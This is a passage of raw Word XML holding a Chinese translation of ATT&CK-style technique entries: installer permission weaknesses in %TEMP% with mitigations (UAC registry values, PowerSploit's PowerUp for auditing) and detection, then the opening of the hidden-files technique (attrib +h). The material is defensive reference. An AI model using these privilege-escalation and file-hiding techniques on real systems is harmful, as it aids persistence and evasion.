        <w:t>可执行安装程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495AC041" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此技术的另一个变体是利用可执行的自解压安装程序的常见缺陷。在安装过程中，安装程序通常使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>%TEMP%</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录中的子目录来解压缩二进制文件，例如动态链接库，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EXE</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或其他有效负载。安装程序在创建子目录和文件时，通常不会设置适当的权限来限制写访问，这就会允许执行子目录中的非信任代码或覆盖安装过程中使用的二进制文件。此行为与动态链接库搜索顺序劫持有关，并可能利用此劫持技术。某些安装程序可能还需要提升权限，这将导致在执行攻击者控制的代码时提升权限。此行为与绕过用户账号控制有关。已向软件供应商报告了现有通用安装程序中存在这种缺陷的几个例子。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398E525C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00557D03" w14:paraId="4E9E4314" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="23FA579C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00557D03" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00557D03">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="55FFBA63" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00557D03" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00557D03">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="1F88C813" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28802B50" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>审核</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="580A55C2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用审核</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>工具</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>检测</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>企业系统中文件系统权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>滥用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>情况并对检测到</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>的情况进行</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>纠正。像</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
              <w:t>PowerSploit</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>框架这样的工具包包含</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>owerUp</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>模块，可用于探索系统中的服务文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>系统权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>缺陷。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="732597FC" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D703726" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>用户账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>控制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35009A20" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>以下内容</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来关闭标准用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
              </w:rPr>
              <w:t>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>UAC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限提升功能、自动拒绝提升请求：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
              </w:rPr>
              <w:t xml:space="preserve"> "ConsentPromptBehaviorUser"=dword:00000000</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。考虑添加以下内容为</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>所有用户启用安装程序检测功能：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
              </w:rPr>
              <w:t xml:space="preserve"> "EnableInstallerDetection"=dword:00000001</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。此功能启用后</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>会提示输入安装密码并记录尝试日志。如需禁用安装程序检测，请添加以下</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>内容</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
              </w:rPr>
              <w:t>"EnableInstallerDetection"=dword:00000000</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。这可能</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>会</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防止攻击者在</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>UAC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测安装程序时利用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来提升权限，但是允许继续安装过程而且不记录</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>日志</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="766C3A36" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0444A100" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>用户账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57E1399E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制用户账号和组的权限，使得只有授权管理员才能与服务更改和服务二进制目标路径位置进行交互。拒绝从用户目录执行，例如文件下载目录和临时目录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31022553" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A5EB6CC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E977B30" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查找通常在软件更新期间可能发生的二进制文件和服务可执行文件的更改。编写、重命名和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或移动可执行文件来匹配现有服务可执行文件的行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会被检测到</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并与其他可疑行为相关联。二进制文件和服务可执行文件的哈希可以用来检测历史数据的替换。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745DBA6C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从典型进程和服务中查找异常进程调用树，并查看是否</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与发现操作或其他攻击技术相关的其他命令的执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC5C735" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>隐藏文件和目录</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="738115C1" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20780D67" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1158</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38A6F765" w14:textId="1C5E6296" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>逃逸，</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="786DA266" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20FC128D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0160697E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ABBB813" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>主机</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>取证</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>分析</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E919EAD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A2C952F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B640084" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了防止普通用户意外更改系统上的特殊文件，大多数操作系统都有“隐藏文件”的概念。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当用户使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GUI</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览文件系统或在命令行上使用普通命令时，这些文件不会显示。用户必须通过一系列</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>UI</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提示或命令行开关（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>dir /a</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>inux</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mac</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>ls –a</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）明确要求才能显示隐藏的文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2674BCFE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会利用这一点，将文件和文件夹隐藏在系统上的任何位置，从而获得持久性并规避不包含隐藏文件调查的典型用户或系统分析。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67832B78" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E279A93" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>attrib.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二进制文件将特定文件标记为隐藏。他们只需使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>attrib +h filename</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可</w:t>
      </w:r>
